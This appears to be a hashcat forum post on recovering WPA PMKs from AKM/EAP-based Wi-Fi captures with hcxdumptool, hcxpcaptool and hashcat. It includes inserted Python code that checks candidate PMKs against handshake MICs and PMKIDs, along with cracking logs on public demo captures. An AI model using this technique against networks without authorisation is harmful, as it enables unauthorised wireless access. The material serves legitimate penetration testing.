You can retrieve a PSK or a PMK only from a weak client. Therefore you must run hcxdumptool for a long time against your penetration target.
We cannot distinguish between an ESSID, a damaged ESSID, a PSK and a PMK within WLAN traffic. So we assume a 32-byte string could possibly be a PMK and, when running option -P, store it in your probabili-pass list.
Also, a PMK attack is only useful if your penetration test target uses AKM (Authentication Key Management). Normally it is useless on PBKDF2-related networks (WPA1, WPA2, WPA2 key version 3).
The simplest correct command line for hashcat is:
hashcat -m 2501 test.hccapx pmkfile
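As an added example (not code from this post, from hcxtools or from hashcat), the following Python shows what a PMK-list run like the one above actually checks: the 32-byte candidate filter behind the -P heuristic, the PBKDF2 derivation that PSK networks use (the step -m 2501 skips because the PMK is supplied directly), and verification of a candidate PMK against a 4-way handshake MIC and against a PMKID (the artefact discussed at the end of the post). MAC addresses, nonces and the EAPOL frame are constructed for the demo; the only real value is the public IEEE 802.11i test vector (passphrase "password", SSID "IEEE").

```python
import hashlib
import hmac

# Added example, not code from the original post, hcxtools or hashcat.
# Everything below is constructed except the PBKDF2 test vector
# (passphrase "password", SSID "IEEE") from IEEE 802.11i Annex H.

PTK_LABEL = b"Pairwise key expansion"
PMKID_LABEL = b"PMK Name"


def is_candidate_pmk(token: str) -> bool:
    """Heuristic the post describes for hcxdumptool -P: a PMK is 32 bytes, so any
    64-character hex string seen in traffic may be one (or may just be an ESSID
    or PSK that happens to look like hex; the filter cannot tell them apart)."""
    if len(token) != 64:
        return False
    try:
        bytes.fromhex(token)
    except ValueError:
        return False
    return True


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PSK networks (WPA1/WPA2): PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096, 32).
    This is the expensive per-candidate step of -m 2500/16800 that -m 2501 skips."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def prf_512(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11 PRF-512 (HMAC-SHA1 form, WPA2 key version 2): expands the PMK
    into the 64-byte PTK. The KCK used for the EAPOL MIC is its first 16 bytes."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes covers the 64 bytes required
        out += hmac.new(pmk, PTK_LABEL + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(pmk, aa, spa, anonce, snonce, eapol_frame, mic_offset=81):
    """WPA2 EAPOL-Key MIC: HMAC-SHA1 over the frame with the MIC field zeroed,
    truncated to 16 bytes. Offset 81 = 802.1X header (4) + descriptor fields up
    to and including the Key ID (77)."""
    kck = prf_512(pmk, aa, spa, anonce, snonce)[:16]
    zeroed = eapol_frame[:mic_offset] + b"\x00" * 16 + eapol_frame[mic_offset + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def pmkid(pmk: bytes, aa: bytes, spa: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA). Needs only the PMK,
    whatever produced it (PBKDF2 from a passphrase or an EAP/AKM master key)."""
    return hmac.new(pmk, PMKID_LABEL + aa + spa, hashlib.sha1).digest()[:16]


def find_pmk_by_mic(candidates, aa, spa, anonce, snonce, eapol_frame, expected_mic):
    """Try every plausible 32-byte candidate against the captured handshake MIC,
    with no PBKDF2 at all. Returns the matching hex string or None."""
    for token in candidates:
        if not is_candidate_pmk(token):
            continue
        if eapol_mic(bytes.fromhex(token), aa, spa, anonce, snonce, eapol_frame) == expected_mic:
            return token
    return None


def find_pmk_by_pmkid(candidates, aa, spa, expected_pmkid):
    """Same idea against a captured PMKID (needs only AP and client MACs)."""
    for token in candidates:
        if is_candidate_pmk(token) and pmkid(bytes.fromhex(token), aa, spa) == expected_pmkid:
            return token
    return None


# Constructed demo network: the PMK is the known test vector, so the "captured"
# MIC and PMKID can be produced here and the search shown end to end.
DEMO_AA = bytes.fromhex("001122334455")   # constructed AP MAC
DEMO_SPA = bytes.fromhex("66778899aabb")  # constructed client MAC
DEMO_ANONCE = bytes(range(32))            # constructed nonces
DEMO_SNONCE = bytes(range(32, 64))
DEMO_PMK = derive_pmk("password", "IEEE")
# Minimal EAPOL-Key message-2 shaped buffer: 81 header bytes, 16 MIC bytes, 2-byte key data length
DEMO_EAPOL = (b"\x01\x03\x00\x5f\x02\x01\x0a\x00\x10" + b"\x00" * 8 + DEMO_SNONCE
              + b"\x00" * 32 + b"\x00" * 16 + b"\x00\x00")
DEMO_MIC = eapol_mic(DEMO_PMK, DEMO_AA, DEMO_SPA, DEMO_ANONCE, DEMO_SNONCE, DEMO_EAPOL)
DEMO_PMKID = pmkid(DEMO_PMK, DEMO_AA, DEMO_SPA)
# A -P style list mixing ESSIDs, non-PMK strings and one real PMK (constructed)
DEMO_LIST = ["mynet", "IEEE", "0123456789abcdef" * 2, "z" * 64, "a" * 64, DEMO_PMK.hex()]


def demo() -> str:
    """Run the MIC check over the constructed list; returns the recovered PMK hex."""
    return find_pmk_by_mic(DEMO_LIST, DEMO_AA, DEMO_SPA, DEMO_ANONCE, DEMO_SNONCE, DEMO_EAPOL, DEMO_MIC)


if __name__ == "__main__":
    print("candidate accepted:", demo())
    print("same PMK via PMKID:", find_pmk_by_pmkid(DEMO_LIST, DEMO_AA, DEMO_SPA, DEMO_PMKID))
```

The speed difference in the post's hashcat output (thousands of candidates per second from a PMK list, with no PBKDF2 iterations) comes from the fact that `find_pmk_by_mic` and `find_pmk_by_pmkid` never call `derive_pmk`: once a PMK is in hand, only a handful of HMAC-SHA1 calls per candidate are needed, which is also why a PMK list is worthless against a PSK network unless the PMK was derived from that network's ESSID.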
You can test it by running the examples from here:
https://hashcat.net/forum/thread-7717-po...l#pid42813
copy PMK to pmklist
use the hcxpcaptool -O option:
$ hcxpcaptool -O test.hccapx sae4way.pcapng
reading from sae4way.pcapng
summary:
file name....................: sae4way.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.16-arch1-1-ARCH
file application information.: hcxdumptool 5.0.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianness...................: little endian
read errors..................: flawless
packets inside...............: 15
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 1
probe requests...............: 1
probe responses..............: 1
association requests.........: 1
association responses........: 1
authentications (SAE)........: 4
EAPOL packets (total)........: 6
EAPOL packets (AKM defined)..: 4
EAPOL packets (WPA2).........: 2
EAPOL PMKIDs (total).........: 1
EAPOL PMKIDs (AKM defined)...: 1
raw handshakes...............: 1 (ap-less: 0)
1 handshake(s) written to test.hccapx
$ hashcat -m 2501 test.hccapx pmklist
hashcat (v5.1.0-895-g8121073d) starting...
Session..........: hashcat
Status...........: Cracked
Hash.Name........: WPA-EAPOL-PMK
Hash.Target......: mynet (AP:c8:3a:35:ce:46:3f STA:c8:3a:35:c2:4f:bc)
Time.Started.....: Wed Apr 10 09:24:42 2019 (0 secs)
Time.Estimated...: Wed Apr 10 09:24:42 2019 (0 secs)
Guess.Base.......: File (pmklist)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2078 H/s (0.00ms) @ Accel:1024 Loops:512 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 3fff2ed5188624e83da421f68562f1f8271884c48ed7036269cbb76480eed19b -> 3fff2ed5188624e83da421f68562f1f8271884c48ed7036269cbb76480eed19b
Hardware.Mon.#1..: Temp: 53c Fan: 39% Util: 14% Core:1835MHz Mem:5005MHz Bus:16
Started: Wed Apr 10 09:24:27 2019
Stopped: Wed Apr 10 09:24:43 2019
or from here:
https://wiki.wireshark.org/SampleCaptures
search for eap-tls and you will find this:
File: wpa-eap-tls.pcap.gz
Description: 802.11 capture with WPA-EAP. PSK's to decode: a5001e18e0b3f792278825bc3abff72d7021d7c157b600470ef730e2490835d4 79258f6ceeecedd3482b92deaabdb675f09bcb4003ef5074f5ddb10a94ebe00a 23a9ee58c7810546ae3e7509fda9f97435778d689e53a54891c56d02f18ca162
download wpa-eap-tls.pcap.gz
(https://wiki.wireshark.org/SampleCapture...ls.pcap.gz)
copy PMKs to pmklist
run hcxpcaptool and hashcat
$ hcxpcaptool -O test.hccapx wpa-eap-tls.pcap.gz
decompressing wpa-eap-tls.pcap.gz to /tmp/wpa-eap-tls.pcap.gz.tmp
reading from wpa-eap-tls.pcap.gz.tmp
summary:
file name....................: wpa-eap-tls.pcap.gz.tmp
file type....................: pcap 2.4
file hardware information....: unknown
file os information..........: unknown
file application information.: unknown
network type.................: DLT_IEEE802_11_RADIO (127)
endianness...................: little endian
read errors..................: flawless
packets inside...............: 86
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
EAPOL packets (total)........: 4
EAPOL packets (WPA2).........: 4
EAPOL PMKIDs (total).........: 1
EAPOL PMKIDs (WPA2)..........: 1
EAP packets..................: 20
found........................: EAP type ID
found........................: EAP-TLS Authentication
raw handshakes...............: 1 (ap-less: 0)
best handshakes..............: 1 (ap-less: 0)
best PMKIDs..................: 1
1 handshake(s) written to test.hccapx
$ hashcat -m 2501 test.hccapx pmklist
hashcat (v5.1.0-895-g8121073d) starting...
Session..........: hashcat
Status...........: Cracked
Hash.Name........: WPA-EAPOL-PMK
Hash.Target......: (AP:10:6f:3f:0e:33:3c STA:24:77:03:d2:5e:a8)
Time.Started.....: Wed Apr 10 09:30:26 2019 (0 secs)
Time.Estimated...: Wed Apr 10 09:30:26 2019 (0 secs)
Guess.Base.......: File (pmklist)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 9880 H/s (0.00ms) @ Accel:1024 Loops:512 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4/4 (100.00%)
Rejected.........: 0/4 (0.00%)
Restore.Point....: 0/4 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 3fff2ed5188624e83da421f68562f1f8271884c48ed7036269cbb76480eed19b -> 23a9ee58c7810546ae3e7509fda9f97435778d689e53a54891c56d02f18ca162
Hardware.Mon.#1..: Temp: 44c Fan: 29% Util: 16% Core:1911MHz Mem:5005MHz Bus:16
Started: Wed Apr 10 09:30:18 2019
Stopped: Wed Apr 10 09:30:27 2019
You can also see a best PMKID, but you can't convert it for use with hashcat, because that PMKID isn't PBKDF2 based. I disabled the conversion of non-PBKDF2-related PMKIDs in the latest hcxpcaptool.
The EAPOL frame is converted only when running option -O (!), because hashcat is able to verify AKM-based EAPOL since this pull request:
https://github.com/hashcat/hashcat/commi...eb046e5047
I disabled the conversion of non-PBKDF2-related EAPOL frames when running option -o (!), too.
All examples only work on latest hcxdumptool, hcxtools and hashcat!
I suggest running hcxdumptool for a long time and collecting the lists you retrieve with -E, -I, -U. From time to time, run
your EAPOL (hccapx) and/or PMKID (16800) hashes against these lists. Run hcxwltool on those lists.
Also run hcxpsktool on the hash files (hccapx and 16800).
Also, we need a new hashline to distinguish between PBKDF2 (incl. crossover/reuse PBKDF2) and AKM-related handshakes.
Read more here:
https://github.com/hashcat/hashcat/issues/1816
Remarks:
All used hashes and PMKs are public demo hashes and public demo PMKs!